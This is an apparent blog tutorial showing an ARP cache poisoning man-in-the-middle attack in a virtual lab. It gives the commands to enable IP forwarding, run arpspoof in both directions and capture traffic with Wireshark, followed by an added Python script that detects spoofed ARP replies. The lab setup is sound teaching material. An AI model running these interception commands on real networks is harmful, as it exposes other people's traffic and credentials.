
ARP Cache Poisoning Attack with IP Forwarding

  • Parag Shimpi
  • Aug 30, 2019
  • 2 min read

The basic working of ARP is shown in the following figure.

Fig. Basic ARP Working

ARP Cache poisoning attack:


ARP cache entries are flushed after some time because the network topology changes, and any machine can send an ARP reply. An attacker can therefore send an ARP reply too, and the target will accept it regardless. The target does not even check whether it sent an ARP request in the first place. Here you can see an ARP cache poisoning attack with IP forwarding.

Fig. ARP cache poisoning attack with IP forwarding

In the above diagram you can see that the Kali Linux system sits in the middle of the communication between Metasploitable 2 (Target 1) and XP (Target 2). This is called a MITM (Man In The Middle) attack. Because IP forwarding is enabled, Kali Linux forwards the traffic coming from the Metasploitable 2 system to the XP system. Similarly, Kali forwards the traffic from XP to Metasploitable 2. Thus all the traffic goes through Kali Linux. This is the intention behind ARP cache poisoning. Note that IP forwarding is necessary; otherwise the result is a DoS (Denial of Service) condition.


Deliverable:


Lab Set up

  • Virtualization using Oracle VirtualBox

  • Attacker’s System: Kali Linux

  • Target 1 System: Windows XP

  • Target 2 System: Metasploitable 2


In Kali Linux Terminal

1. To start IP Forwarding in Kali Linux

~# echo 1 > /proc/sys/net/ipv4/ip_forward



2. To start MITM attack

~# arpspoof -i {interface} -t {target 1} {target 2}


Here, -i --> interface

{interface} --> Kali Linux's interface e.g. wlan0

-t --> target

{target 1} --> IP address of target 1 e.g. Windows XP

{target 2} --> IP address of target to be spoofed e.g. Metasploitable 2



3. Similarly, to start MITM attack in reverse direction

~# arpspoof -i {interface} -t {target 1} {target 2}


Here, -i --> interface

{interface} --> Kali Linux's interface e.g. wlan0

-t --> target

{target 1} --> IP address of target 1 e.g. Metasploitable 2

{target 2} --> IP address of target to be spoofed e.g. Windows XP



4. Now start Wireshark in Kali Linux



5. Now you can try connecting XP with any service of Metasploitable 2, e.g. the FTP service.



6. You can see the traffic going between XP and Metasploitable 2 in Kali Linux.
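
Seen from the defender's side, the poisoning in this lab leaves two signs in ARP traffic: replies that answer no request, and an IP address whose MAC address changes. The following is an added example, not part of the original post, that parses ARP payloads and flags both; the MAC and IP addresses are constructed sample values and the function names are this example's own.

```python
import struct

def build_arp(op, sha, spa, tha, tpa):
    """Build a 28-byte Ethernet/IPv4 ARP payload (only used to construct the sample)."""
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    ip = lambda a: bytes(int(x) for x in a.split("."))
    return struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + mac(sha) + ip(spa) + mac(tha) + ip(tpa)

def parse_arp(payload):
    """Return (op, sender_mac, sender_ip, target_ip), or None if not Ethernet/IPv4 ARP."""
    if len(payload) < 28:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", payload[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    dotted = lambda b: ".".join(map(str, b))
    return op, payload[8:14].hex(":"), dotted(payload[14:18]), dotted(payload[24:28])

def detect(payloads):
    """Flag ARP replies nobody asked for and IP-to-MAC bindings that change."""
    bindings, pending, alerts = {}, set(), []
    for n, payload in enumerate(payloads, 1):
        parsed = parse_arp(payload)
        if parsed is None:
            continue
        op, sha, spa, tpa = parsed
        if op == 1:                       # request: spa asked who has tpa
            pending.add((spa, tpa))
        elif op == 2 and (tpa, spa) not in pending:
            alerts.append((n, "unsolicited-reply", spa, sha))
        elif op == 2:
            pending.discard((tpa, spa))
        # Trust on first use: the first MAC seen for an IP is kept as the baseline.
        if bindings.setdefault(spa, sha) != sha:
            alerts.append((n, "binding-changed", spa, sha))
    return alerts

# Constructed sample: lab-style addresses and MACs, not taken from the page.
XP, MSF, KALI = "08:00:27:11:11:11", "08:00:27:22:22:22", "08:00:27:aa:aa:aa"
ZERO = "00:00:00:00:00:00"
SAMPLE = [
    build_arp(1, XP, "192.168.56.101", ZERO, "192.168.56.102"),   # XP asks for Metasploitable 2
    build_arp(2, MSF, "192.168.56.102", XP, "192.168.56.101"),    # genuine answer
    build_arp(2, KALI, "192.168.56.102", XP, "192.168.56.101"),   # forged: .102 is at Kali's MAC
    build_arp(2, KALI, "192.168.56.101", MSF, "192.168.56.102"),  # forged, reverse direction
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The packet numbers in the alerts are positions in the input list, so they line up with frame order when the payloads are taken from a capture in sequence.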


 © InfoSec Tutorials by Parag Shimpi 2019
